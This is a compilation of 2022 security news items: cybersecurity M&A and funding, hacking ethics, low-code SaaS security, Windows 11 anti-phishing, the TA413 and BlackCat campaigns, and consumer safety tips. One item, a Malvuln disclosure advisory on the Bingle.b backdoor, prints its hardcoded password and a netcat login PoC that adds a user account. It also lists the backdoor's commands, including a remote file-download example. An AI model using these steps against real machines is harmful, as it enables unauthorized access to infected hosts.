Funding has been somewhat lower than last year, but investment remains healthy, analysts say, amid thirst for cloud security in particular.

The cybersecurity industry continues to remain largely unaffected by the uncertainty surrounding the rest of the economy.

Though funding activity this year is somewhat slower than in 2021 and market valuations of cybersecurity firms have taken a hit, mergers and acquisitions activity has remained strong through the year, as has investor interest in the sector.

So far in the third quarter, there have been multiple major transactions that, according to analysts, highlight the overall robustness of the sector amid broadening concerns of a recession.

**Robust M&A Activity**

Two of the biggest involved previously announced deals: In September, Google completed its planned acquisition of incident response firm Mandiant for $5.4 billion, and in August, private equity firm Thoma Bravo closed it $6.9 billion purchase of identity management vendor SailPoint.

That same month, Thoma Bravo announced plans to acquire Ping Identity for $2.8 billion in cash. The $28.50 per share that the private equity firm offered for Ping represented a 63% premium over the identity management vendor's closing share price on Aug. 2. Thoma Bravo will take Ping private once the deal is completed in the fourth quarter. 

Other examples of M&A activity in the third quarter include Devo's purchase of SOAR vendor LogicHub for an undisclosed amount, Volaris Group's acquisition of Hitachi ID Systems in September, Cerberus Sentinel's purchase of application security vendor CyberViking, and CrowdStrike's acquisition of Reposify last week.

M&A activity in the third quarter is consistent with activity in the previous two quarters. Data from Momentum Cyber shows there were a total of 148 cybersecurity M&A deals during the first half of 2022. Total M&A volume over the period was nearly $103 billion. Momentum Cyber identified eight M&A transactions during the first half of 2022 that topped $1 billion, including the SailPoint and Mandiant deals, and private equity firm KKR's $4 billion acquisition of Barracuda.

The most obvious trend of late has been the move by larger vendors to buy into the attack surface management (ASM) space, and more specifically external attack surface management (EASM), says Rik Turner, an analyst with Omdia.

"This has, of course, been underway for a while," he says, pointing to Palo Alto's purchase of Expanse in November 2020 and Microsoft picking up RiskIQ in July 2021. "But there has been something of an intensification of this tendency of late, with Tenable acquiring Bit Discovery in April, IBM buying Randori in June, and CrowdStrike picking up Reposify last week," Turner says.

There are numerous other EASM vendors, so there will be no shortage of acquisition targets for any other big players that want to get into this market, he says.

**Multiple Market Drivers**

Turner says one of the other trends driving the M&A activity is growing interest in proactive security technologies, as opposed to the focus on reactive detection and response of the past few years.

"The proactive wave posits not a replacement technology for the reactive ones, but rather complementary ones that seek to reduce a customer's overall attack surface before threat actors have even launched an attack," Turner says. "Unlike the extended detection and response (XDR) spectrum, proactive security doesn't have a single acronym or initialism yet that can capture the imagination of the market, though Omdia is tentatively proposing security posture management, or SPM." 

Examples of products that fall into this category include cloud-specific proactive technologies such as cloud security posture management (CSPM), SaaS security posture management (SSPM), and cloud permissions management (CPM). Breach and attack simulation technologies are other examples as are vulnerability management and patch management, Turner says.

Chris Stafford, a senior manager in West Monroe's M&A practice, sees another set of factors driving the financial activity in the cybersecurity space. According to Stafford, the big ones are accelerated cloud adoption, the shift to remote work, and the continuing talent shortage. 

 "Fundamentally, cybersecurity is a really durable sector from a growth and revenue perspective," Stafford says. "All companies across all sectors require cybersecurity tools and services. That is what is fundamentally driving growth in the industry."

**Funding & VC Interest Slow but Remain Healthy**

While M&A activity has maintained a robust pace through the year, funding activity has been somewhat lower than last year, as noted earlier. Data from analyst firm IT-Harvest shows that through Sept. 1, some 220 vendors received a total of $12.3 billion in direct funding from investors. 

"That is half of 2021's record $24 billion, but more than the previous year's $10 billion," says Richard Stiennon, chief research scientist at IT-Harvest, adding that just 33 companies received more than $100 million so far this year, compared with 69 in 2021. "I expect to see the industry finish the year at $15 billion total invested," Stiennon says.

Omdia's Turner says while venture capital funding overall appears to have dipped somewhat, there is still plenty of money available for projects that VC's find especially interesting. "I think they have gotten somewhat choosier than they were in 2021," Turner says.

IT-Harvest's analysis of funding activity so far this year showed that investors are pouring more money into the security analytics space — $2.6 billion — than any other segment. Stiennon points to the more than $500 million in total that Devo has raised so far and the massive $1-plus billion funding round that Securonix received in February as examples of investor interest in this segment.

Identity and network security were the next two most active categories, with $1.4 billion in funding in each. There is also a trend of investing in cloud analytics and general security operations center tools like XDR, and a resurgence in vulnerability management startups that are getting funding, Stiennon notes.

"In short, funding is extremely healthy. No surprise to me because venture funding is not like the stock market, where you invest on expectations of next quarter's results," he says. "Most VCs have a five-year horizon, and they can count on cybersecurity to still be a growing sector through an economic downturn."

Despite Recession Jitters, M&A Dominates a Robust Cybersecurity Market

Backdoor.Win32.Bingle.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Bingle.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: BingleType: PE32MD5: eacaa12336f50f1c395663fba92a4d32Vuln ID: MVID-2022-0643 Disclosure: 09/24/2022004029A0                 call    sub_4010E0004029A5                 add     esp, 0Ch004029A8                 cmp     eax, ebp004029AA                 jge     short loc_4029CC004029AC                 mov     edi, [esp+eax*4+230h+var_21C]004029B0                 mov     ecx, ebx004029B2                 xor     eax, eax004029B4                 repne scasb004029B6                 not     ecx004029B8                 sub     edi, ecx004029BA                 mov     edx, ecx004029BC                 mov     esi, edi004029BE                 mov     edi, offset aLetMeIn ; "let me in"Exploit/PoC:C:\>nc64.exe x.x.x.x 22let me in Nt Shell 1.0 beta by bingle@email.com.cn        Indicator '#' is NTShell Server output.        Type ?help for support commands beyond cmd;        ?use at command line for support parameters.        Use 'net helpmsg xxx' to see detail message of Error Code.Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user hyp3rlinx 1313 /addnet user hyp3rlinx 1313 /addThe command completed successfully.C:\Users\Victim\Desktop>?help#?autorun [name file "args"] --- add the [file] to autorun when reboot,                 [file] default is ntshell.exe#?canceldata            --- abort the previous file transfer command#?chdir <dir>           --- change the server current dir to <dir>,                 can be UNC(share) name#?get <file> [port]     --- GET <file> from server, server use [port] to tranfer#?help                  --- show this HELP#?httpget <url> <file>  --- get the 'file' from 'url',                eg:httpget http://192.168.0.1 /hackdir/hackprog.exe#?pskill PID            --- Kill the Process with PID#?pslist                --- List the all process in system#?put <file> [port]     --- PUT <file> to server, server use [port] to tranfer#?quit                  --- QUIT the telnetd program#?restart [<user> [pass]]       --- restart the shell as [user] in stead of                IUSR_computer if [user] specified, no need to reconnect#?sysinfor              --- Get the System os informationDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Bingle.b MVID-2022-0643 Hardcoded Credential

For white hats who play by the rules, here are several ethical tenets to consider.

Earlier this year when international cyber-gang Lapsus$ attacked major tech brands including Samsung, Microsoft, Nvidia and password manager Okta, an ethical line seemed to have been crossed for many cybercriminals.

Even by their murky standards, the extent of the breach, the disruption caused, and the profile of the businesses involved was just too much. So, the cybercrime community came together to punish Lapsus$ by leaking information on the group, a move that ultimately led to their arrest and breakup.

So maybe there's honor amongst thieves after all? Now, don't get me wrong; this isn't a pat on the back for cybercriminals, but it does indicate that at least some professional code is being followed.

Which raises a question for the wider law-abiding hacking community: Should we have our own ethical code of conduct? And if so, what might that look like?

**What Is Ethical Hacking?**

 First let's define ethical hacking. It is the process of assessing a computer system, network, infrastructure, or application with good intentions, to find vulnerabilities and security flaws that developers might have overlooked. Essentially, it's finding the weak spots before the bad guys do and alerting the organization, so it can avoid any big reputational or financial loss.

Ethical hacking requires, at a bare minimum, the knowledge and permission of the business or organization which is the subject of your attempted infiltration.

Here are five other guiding principles for activity to be considered ethical hacking.

**Hack To Secure**

An ethical and white-hat hacker coming to assess the security of any company will look for vulnerabilities, not only in the system but also in the reporting and information handling processes. The goal these hackers is to discover vulnerabilities, provide detailed insights, and make recommendations for building a secure environment. Ultimately, they're looking to make the organization more secure.

**Hack Responsibly**

Hackers must ensure they have permission, outlining clearly the extent of access the company is giving, as well as the scope of the work they are doing. This is very important. Target knowledge, and a clear scope, help prevent any accidental compromises and establish solid lines of communication if the hacker uncovers anything alarming. Responsibility, timely communication, and openness are vital ethical principles to abide by, and clearly distinguish a hacker from a cybercriminal and from the rest of the security team.

**Document Everything**

All good hackers keep detailed notes of everything they do during an assessment and log all command and tool output. First and foremost, this is to protect themselves. For example, if an issue occurs during a penetration test, the employer will look to the hacker first. Having a timestamped log of the activities performed, be it exploiting a system or scanning for malware, gives piece of mind to organizations by reminding them that hackers work with them, not against them.

Good notes uphold the ethical and legal side of things; they are also the basis of the report hackers will produce, even when there are no major findings. The notes will allow them to highlight the issues they have identified, the steps needed to reproduce the issues, and detailed suggestions on how to fix them.

**Keep Communications Active**

Open and timely communications should be clearly defined in the contract. Staying in communication throughout an assessment is key. Good practice is to always notify when assessments are running; a daily email with the assessment run times is vital.

While the hacker might not need to report all the vulnerabilities they find immediately to their client contact, they still should flag any critical, show-stopping flaw during an external penetration test. This could be an exploitable unauthenticated RCE or SQLi, a malicious code execution, or sensitive data disclosure vulnerability. When encountering these, hackers stop testing, issue a written vulnerability notification via email, and follow up with a phone call. This gives teams on the business side the chance to pause and fix the issue immediately if they choose. It's irresponsible to let a flaw of this magnitude go unflagged until the report is issued weeks later.

Hackers should keep their main points of contact aware of their progress and any major issues they discover as they proceed. This ensures everyone is aware of any issues ahead of the final report.

**Have a Hacker Mindset**

The term hacking was used even before information security grew in importance. It just means to use things in unintended ways. For this, hackers first seek to understand all the intended use cases of a system and take into consideration all its components.

Hackers must keep developing this mindset and never stop learning. This allows them to think both from a defensive and an offensive perspective and is useful when looking at something you have never experienced before. By creating best practices, understanding the target, and creating attack paths, a hacker can deliver amazing results.

Should Hacking Have a Code of Conduct?

Many enterprise applications are built outside of IT, but we still treat the platforms they're built with as point solutions.

We're used to thinking about securing software-as-a-service (SaaS) platforms and the cloud as two separate beasts. This separation stems from the way SaaS and the public cloud first emerged as small point solutions and an extension of the traditional data center, respectively. Today, due to the advent of low code, this separation is wrong, and it's holding us back from seeing what's right in front of our eyes. Low code makes SaaS platforms a part of the public cloud, a place where developers build multiple applications rather than consuming a single one: a cloud platform.

Failing to shift our mindset leads to where we are today, with those applications being left up for grabs with no security visibility. And to make matters worse, low-code applications are embedded right into platforms like Salesforce and Microsoft Dynamics, which we all use and that hold our most sensitive business data.

**How Did We Get Here?**

Origin stories are always interesting because they explain something fundamental about the way we perceive the hero of the story. While SaaS started as an extension of the corporate network, the public cloud started as an extension of the data center. Those very different starting points explain why securing SaaS started with shadow IT (protecting the perimeter) and securing the public cloud started with workload protection (lift-and-shift servers and their network/host agents). This also meant that different security teams were tasked with securing SaaS and the cloud, which of course led to a separation of tools, different threat modeling, and, most importantly, the formation of different security mindsets.

Both SaaS and the public cloud have drastically evolved from those early days. Public cloud vendors introduced ever more granular compute paradigms, gradually introducing infrastructure as a service (IaaS), platform as a service (PaaS), and serverless to help developers focus on the business problem at hand. They also built an entire ecosystem of ready-made solutions for complex yet common problems — identity, permissions, logging, configuration, and deployment, to name a few.

SaaS used to mean a point solution for a specific problem. Salesforce started as a CRM, ServiceNow as a ticketing system, and Office365 as email, spreadsheets, docs, and slides. (While this is more than one solution, these are very specific ones.) Contrast that with today: Salesforce Developers are building apps for just about any business need on top of the Salesforce Platform, ServiceNow low-code apps are handling just about anything from HR to health and finance processes, and Power Platform, Microsoft's low-code platform embedded into Office365, is being used by more than 20 million users across the industry to solve every business need, from productivity through procurement and COVID-related processes.

Clearly, these have become enterprise-grade application development platforms, not point solutions to specific business problems. Many developers today choose to build their applications on platform-provided abstractions, whether those are serverless functions on the public cloud or extendable building blocks on SaaS low-code platforms.

**The Introduction of Business Developers**

Comparing how SaaS platforms started and where they are now clearly shows how far these have come from their earlier versions. But there's still a major shift we haven't mentioned yet: the introduction of business developers.

SaaS low-code platforms draw their power from the data they maintain and their existing users. Those are both not limited to IT but rather skew heavily toward the business. Having access to both business data and business users means that SaaS is in the perfect position to tackle the most pressing issue many enterprises face today — digital transformation.

With a global shortage of developers and the difficulty of streamlining a business process with so many stakeholders, low-code platforms introduce a shortcut, letting the business users streamline their processes themselves without waiting for IT.

Low code is taking off with business users, so much so that in his 2019 Inspire keynote, Microsoft CEO Satya Nadella discussed the opportunity of low code to empower people and to create new white-collar jobs just like Excel did.

Just like the public cloud is an application development platform enabling developers to focus on their business logic, SaaS platforms have become application development platforms using low code to empower business users to become developers and address any business need.

SaaS is now focused on new types of developers addressing a whole range of unmet business needs with dedicated applications, creating a new type of cloud: the business cloud.

**Securing Low Code as an Extension of Cloud**

With the realization that some SaaS platforms are now application development platforms and an extension of the cloud, we should re-examine the responsibilities for securing those applications and bringing them under the security team's umbrella.

We should treat platforms like Salesforce, ServiceNow, and Office365 the same way we treat AWS, Azure, and GCP, where we focus on the applications that were built and are hosted in these application development platforms rather than treating the whole platform as a single application.

Shadow IT, for example, remains an issue with smaller and an ever-growing number of point-solution SaaS. But it doesn't make sense to treat any single platform mentioned above as a single app to discover and catalog. Instead, we should discover and catalog the applications built with those platforms — and there are tens of thousands of those. In most organizations, this enormous complexity is hidden behind a single line in an application inventory.

Applications built with SaaS low-code platforms should be examined with the same security rigor we use for those built on the cloud because, at the end of the day, an application is an application, no matter where it was built and hosted.

What does matter for the security of our business applications is the people, process, and tools that are involved in making, maintaining, and protecting those applications. For applications built in the cloud, we have professional developers, automated CI/CD processes, and various security tools from code scanning and dynamic analysis through runtime monitoring and prevention. For applications built on SaaS low-code platforms, we have some professional developers but also business users who are not security-savvy, with few to no deployment processes and no security controls or guarantees.

Thinking about low-code platforms as part of SaaS makes it difficult for us to see that a huge portion of our business applications are now being built by the business, outside of IT and outside of security control. To begin seeing the problem and figuring out our approach to it, we must shift our mindset to acknowledge low-code platforms as a part of the cloud and treat the applications on those platforms like we do any other application.

We're Thinking About SaaS the Wrong Way

Categories: News
Tags: Windows 11

Tags:  Windows 10

Tags:  phishing

Tags:  protection

Tags:  warning

Tags:  message

Tags:  Defender Smartscreen

We take a look at a new set of security features for Windows 11, and see what Windows 10 can expect to miss out on.



(Read more...)




The post Windows 11 pulls ahead of Windows 10 in anti-phishing stakes appeared first on Malwarebytes Labs.

Some new security additions and changes have been announced for users of Windows, but you’ll have to be using Windows 11 to get the most out of them. Windows 10 users may find that this is going to be a case of falling behind the herd ever so slightly.

**Anti-phishing tools**

Enhanced phishing protection, by way of Smartscreen, is the name of the game, and Microsoft is all too happy to explain the changes. Smartscreen is a Windows feature which helps ward off bogus sites phishing for personal data and payment information. People running IE8 and later will also find it attempts to protect against infectious files. It offers slightly different features depending on which flavour of Microsoft browser you’re using, but the overall end result is largely the same: A variety of protections against phishing portals.

In terms of features for Windows 11, enhanced phishing protection “automatically detects when users type their password into any app or site”. Windows knows “in real time” whether websites and apps have secure connections to trusted websites, notifying users of potential danger up ahead and also spreading word to other users when a phishing attack is blocked.

There is also mention of Windows analysing when and where password entry occurs, notifying users of potentially unsafe usage. This sounds a lot like how many password managers operate, popping a notification when (for example) password reuse is detected. One key difference here is that using passwords in an unsafe way is “reported to IT” for incident tracking purposes.

**Friendly popups**

There are some interesting additions to the user experience. Typing a password into a phishing site in a Chromium browser, or an application connecting to a phishing portal, presents the user with a popup which says:

> _This app made an unsafe connection that was reported to Microsoft for stealing passwords. Your organisation recommends changing your work or school password to keep your account safe._

Clicking the **change password** button takes users to sign-in options where they can alter the password as needed. Microsoft says that without this feature, credentials may be handed over to the fake site. On the other hand, popups that lead people from dangerous sites to password amendment options may encourage malicious imitations that trick unwary users. However, two sets of popups might increase the chances of something untoward being noticed, but the history of UX is littered with intolerant users blazing through that sort of thing.

Elsewhere, Windows will notify users who are typing passwords into notepad files and other programs that this is bad practice. As per the relevant popup:

> _It’s unsafe to store your password in this app. Your organisation considers it unsafe to store your password in this app and recommends removing your password from this file._

We’re not here today to discuss the merits and drawbacks of off-the-beaten-track password systems. However, it’s worth noting that this detection of typed passwords is raising some eyebrows:

> The advice is good but it should come from a human, not the OS. How long has Windows been reading what I paste into Notepad? #privacy #security https://t.co/7iZNWDpzG7
> 
> — m (@tinymwriter) September 23, 2022

**Windows 11, but not 10**

Finally, we come to the part where our two operating system paths diverge.

Custom-made phishing alerts are available to Windows 11 users, but not to users of Windows 10. Organisations can configure Enhanced Phishing Protection to warn uses about password reuse, unsafe apps, and malicious activity, and can and switch the feature's audit mode on and off, which determines whether sends telemetry about unsafe password events.

It’s to be expected that Windows 11 will eventually pull away from 10 in the security frontrunner stakes. Although adoption was low at the tail end of 2021, numbers will slowly ramp up over time as the Windows 10 end-of-life approaches, and organisations catch up with the stringent hardware requirements.

Only a few months back, we saw Microsoft tackling RDP intrusion with rate limiting for login attempts. We also now have upgrades to kernel protection, more support for hybrid work operations, and new default limits for SMB server authentication. It’s inevitable that we’ll continue to see this happening, and so the gulf will widen between the OS siblings.

No matter which version you’re running, ensure you keep your OS fully up-to-date and enable the security options most relevant to you. There’s enough choice available to hopefully configure your devices the exact way you need them to be running at any given time.

Stay safe out there!

Windows 11 pulls ahead of Windows 10 in anti-phishing stakes

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.
Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

The intrusions involved the exploitation of CVE-2022-1040 and CVE-2022-30190 (aka "Follina"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.

"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies," Recorded Future said in a new technical analysis.

TA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed FriarFox.

The group's exploitation of the Follina flaw was previously highlighted by Proofpoint in June 2022, although the ultimate end goal of the infection chains remained unclear.

Also put to use in a spear-phishing attack identified in May 2022 is a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

In another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.

LOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.

"The group continues to incorporate new capabilities while also relying on tried-and-tested \[tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of wider trends with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

The BlackCat ransomware crew has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach.
"Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software," researchers from Symantec

The BlackCat ransomware crew has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach.

"Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software," researchers from Symantec said in a new report.

BlackCat, also known by the names ALPHV and Noberus, is attributed to an adversary tracked as Coreid (aka FIN7, Carbanak, or Carbon Spider) and is said to be a rebranded successor of DarkSide and BlackMatter, both of which shut shop last year following a string of high-profile attacks, including that of Colonial Pipeline.

The threat actor, like other notorious ransomware groups, is known to run a ransomware-as-a-service (RaaS) operation, which involves its core developers enlisting the help of affiliates to carry out the attacks in exchange for a cut of the illicit proceeds.

ALPHV is also one of the first ransomware strains to be programmed in Rust, a trend that has since been adopted by other families such as Hive and Luna in recent months to develop and distribute cross-platform malware.

The evolution of the group's tactics, tools, and procedures (TTPs) comes more than three months after the cybercrime gang was discovered exploiting unpatched Microsoft Exchange servers as a conduit to deploy ransomware.

Subsequent updates to its toolset have incorporated new encryption functionalities that enable the malware to reboot compromised Windows machines in safe mode to bypass security protections.

"In a July 2022 update the team added indexing of stolen data -- meaning its data leaks websites can be searched by keyword, file type, and more," the researchers said.

The latest refinements concern Exmatter, a data exfiltration tool used by BlackCat in its ransomware attacks. Besides harvesting files only with a specific set of extensions, the revamped version generates a report of all processed files and even corrupts the files.

Also deployed in the attack is an info-stealing malware called Eamfo that's designed to siphon credentials stored in the Veeam backup software and facilitate privilege escalation and lateral movement.

The findings are yet another indication that ransomware groups are adept at continually adapting and refining their operations to remain effective as long as possible.

"Its continuous development also underlines the focus of the group on data theft and extortion, and the importance of this element of attacks to ransomware actors now," the researchers said.

BlackCat has also been recently observed using the Emotet malware as an initial infection vector, not to mention witnessing an influx of new members from the now-defunct Conti ransomware group following the latter's withdrawal from the threat landscape this year.

The sunsetting of Conti has also been accompanied by the emergence of a new ransomware family dubbed Monti, a "doppelganger" group which has been found purposefully and brazenly impersonating the Conti team's TTPs and its tools.

News of BlackCat adding a revamped slate of tools to its attacks arrives as a developer associated with the LockBit 3.0 (aka LockBit Black) file-encrypting malware allegedly leaked the builder used to create bespoke versions, prompting concerns that it could lead to more widespread abuse by other less skilled actors.

It's not just LockBit. Over the past two years, Babuk and Conti ransomware groups have suffered similar breaches, effectively lowering the barrier for entry and enabling malicious actors to quickly launch their own attacks.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

BlackCat Ransomware Attackers Spotted Fine-Tuning Their Malware Arsenal

By Owais Sultan
With most people being online for most of the day, whether for personal reasons or work-related tasks, cybersecurity…
This is a post from HackRead.com Read the original post: Simple Yet Vital Ways to Safeguard Yourself Against Online Threats

With most people being online for most of the day, whether for personal reasons or work-related tasks, cybersecurity is more important than ever. As the internet evolves and new technologies are created, new ways of scamming people or stealing important data come up too.

Despite rather widespread awareness about the importance of cybersecurity and the prevalence of malicious online attacks, most people do little to nothing to secure themselves against these potential security threats.

Here are a few simple ways of securing yourself against malware and bad actors on the web.

Source: Pexels

**Making unique passwords**

Repeating passwords is something a lot of people do, even if they know it’s inadvisable. Although remembering all your login credentials for all the different sites you’re on can be a herculean task, it also makes you very vulnerable to cyber-attacks. Using extremely generic passwords is also not a good idea as it makes hacking into your account very simple.

Unfortunately, masses of tech users adopt the same approach and this has been proven with research conducted by the likes of ExpressVPN into the most common passwords used globally.

With variations on terms like ‘passwort’ and popular football teams such as ‘Juventus’ highlighted as some of the most commonly used passwords in countries like Germany and Italy, it’s perhaps no surprise that confidential and sensitive information is so easily acquired by bad actors on the internet.

Use password managers that can help you keep track of all of your passwords or random term generators whenever prompted to change your passwords!

**Avoiding messages from unknown sources and unverified sites**

Phishing scams are really common and they’re getting better at what they do. These scams usually involve a fake website, which looks like a legitimate e-store or business, being used to make people enter their sensitive personal and financial information into fields present on the site.

One of the easiest ways of checking whether a site is real or not is by using URL checkers. One can never be too careful because these scams are ever evolving.

Source: Pexels

**Using multiple e-mail addresses**

Having a different email address to use to sign up for services and products is also a helpful way of ensuring your safety. Having multiple e-mail addresses makes sure that not all of your data is in one place. It can also help keep promotional messages and other spam messages with suspicious attachments separate from essential personal communication.

**Authentication and privacy settings**

A lot of sites sell your data to advertisers. Oftentimes, a company’s policy about privacy or selling of data is hidden in the fine print of user agreements, which an overwhelming majority of people do not go through at all. Sometimes, you can check your privacy settings on a site or an app and explicitly instruct them not to sell your data.

If your photos are publicly available on the internet, you should keep in mind the possibility of someone stealing them and pretending to be you or someone else. Anyone who keeps your photos without your explicit consent should be reported immediately. Turning on two-factor authentication for messaging apps is also important.

There are very simple and rather obvious ways in which you can safeguard yourself against cyber-attacks. Oftentimes, people don’t take this advice to heart, but doing so can make you a great deal safer while online!

1.  How to detect phishing images in emails
2.  The Types of Phishing Attacks and How to Dodge All of Them
3.  Scammers Leveraging Microsoft Team GIFs in Phishing Attacks
4.  9 Years Jail for iCloud Phishing Scam Hacker Who Stole Nude Photos
5.  Hoxhunt Primed to Spread Gamified Phishing Awareness in the Enterprise

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Simple Yet Vital Ways to Safeguard Yourself Against Online Threats

By Owais Sultan
Although online fraud includes identity theft, phishing scams, and viruses, there are steps that can be taken to protect against them. Let's dig into the whats and hows of it.
This is a post from HackRead.com Read the original post: 5 Online Fraud Fighting Tips for Novices

Navigating the online sphere can be a big challenge, particularly if you are someone not overly clear on what the threats are and how to target them. If you fall into this category and want to take steps to increase your online safety and reduce the risk of fraud, here are some key tips to follow.

**1\. Stay up-to-date with the ever-changing phishing scams.**

The ways criminals try to get their hands on your information and cash are constantly evolving. Every time companies and consumers take steps to close loopholes; they come up with ever-evolving workarounds. Some scams you can fall prey to are incredibly sophisticated, meaning even the savviest individual might be convinced. They can mimic company websites exactly, fake email addresses and phone numbers, and can use sophisticated techniques to get information out of you.

As a consumer, you must stay on top of what kind of scams are being used, and you prepare yourself to look out for them. You can use many different blogs and online sites, and you can find a wealth of information on sites like Reddit and even Facebook, as well as by using Google. Arming yourself with the knowledge to weed out the crooks and protect yourself is one of the best things you can do when fighting online fraud.

**2\. Install IP lookup tools on your websites/blogs to trace bad actors and traffic (LI)**

If you have your own website or blog page, you might be aware that bad actors and bots enjoy causing trouble. This can come in the form of offensive comments, spam, or overloading your website, causing downtime and crashes. It can also mean hackers target your site to gain access and take it over.

An IP lookup tool is an excellent solution for those who are not overly tech-savvy: it allows the website owner to have oversight of each visitor to the site based on their IP address. In addition, this tool can assess the validity of an IP address, check addresses against blacklists of spammy content, and detect proxy servers, geolocation, domain, and hostname.

These kinds of tools can be used on their own or in conjunction with other methods to understand more about visitors to a site and to help fight back against fraud. An IP lookup tool is a great place to start for those who want to protect their websites, businesses, or other visitors.

**3\. Create secure passwords – regularly change them.**

One of the most common ways nefarious actors gain access to your accounts is not through any kind of high-tech hacking. It is done, simply by guessing your password. According to CNBC, the world’s most popular and most-used passwords are qwerty, password, 12345, and various similar combinations. Many will also use things like their maiden name, which can easily be found online, famous musicians, or footballers’ names. These can be easy for criminals to guess, mainly if they know something about the user. The other issue is that once we have a password, we don’t change it often enough.

To make matters worse, we reuse the same password across multiple platforms, meaning once a criminal has accessed one account, they can access all of them. This is a significant problem and can result in considerable losses and financial detriment to unsuspecting public members. The best way to avoid situations like this is to create secure passwords, change them regularly, and have a different one for each account.

Online password generators can create strong and unique passwords for you, which can then be used for each account. You should try and change your password every three months, four as a maximum. An easy way to remember to do this is by when you change your password to something substantial, scheduling a calendar reminder to change it three to four months in the future. This is one of the best ways to ensure your accounts remain safe and secure.

**4\. Know who is asking**

Many of us are inundated with emails, SMS, and even phone calls that ask us to reveal personal information or follow links to confirm our details. In the vast majority of cases, these will be false and created by criminals who want to trick you.

Any reputable company will not ask you to reveal personal information over the phone or via email. Furthermore, you should be wary of any communications asking you to reset your password, confirm card details, or hand over other information.

The best advice is to deal with each of these requests with suspicion. First, check the email address or number that is being sent- you can search online to see if they have been flagged as suspicious.

Also, make sure they match up with other correspondence from the company. Then, contact the company yourself via the number or email you have used to get them previously and try to verify the recent communication. If possible, send a copy to customer service or your account manager so they can let you know if it is legitimate or not. 

**5\. Protect your devices **

In 2022, most of us will have a range of electronic devices that we use to access the internet and carry out various tasks. These include mobile phones, tablets, laptops, PCs, Smart TVs, eReaders such as Kindle, smartwatches, and home assistants. Many of these devices require us to link them to email accounts, cards, and payment gateways.

We also regularly give them our personal data such as names, addresses, logins and passwords, photos, videos, mobile numbers, and even preferences. This kind of information, if it ends up in the wrong hands, can be devastating, as ICO.org notes.

It can result in identity theft, fraud, and other issues, costing a lot of time, money, and peace. To combat this, it is necessary to take steps to secure and protect your devices. For example, ensure every device you have is secured with a strong password, biometrics, and two-factor authentication. You should also be cautious about logging out of specific devices and accounts on devices when not in use.

It is also worth looking at various security software and anti-virus products that can provide additional protection to you and your data. There are many options on the market that are both easy to use and affordable. Last but not least, many devices such as mobiles, tablets, and PCs have inbuilt software that can assess security for any loopholes or imminent risks, notifying you of steps you need to take to fix them.

1.  US military personnel defrauded into losing $822m through scams
2.  170 fraudulent Android apps scamming cryptocurrency enthusiasts
3.  12 years jail for man who unlocked phones, defrauded AT&T of $200m
4.  Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets
5.  Researchers warn of new Rug Pull scam through fraudulent crypto tokens

5 Online Fraud Fighting Tips for Novices

By Deeba Ahmed
The teen was arrested from Oxfordshire and is still in police custody but his involvement in Uber and GTA hacks is unconfirmed.
This is a post from HackRead.com Read the original post: UK Teen Arrested Amid Uber and GTA 6 Hacking Saga

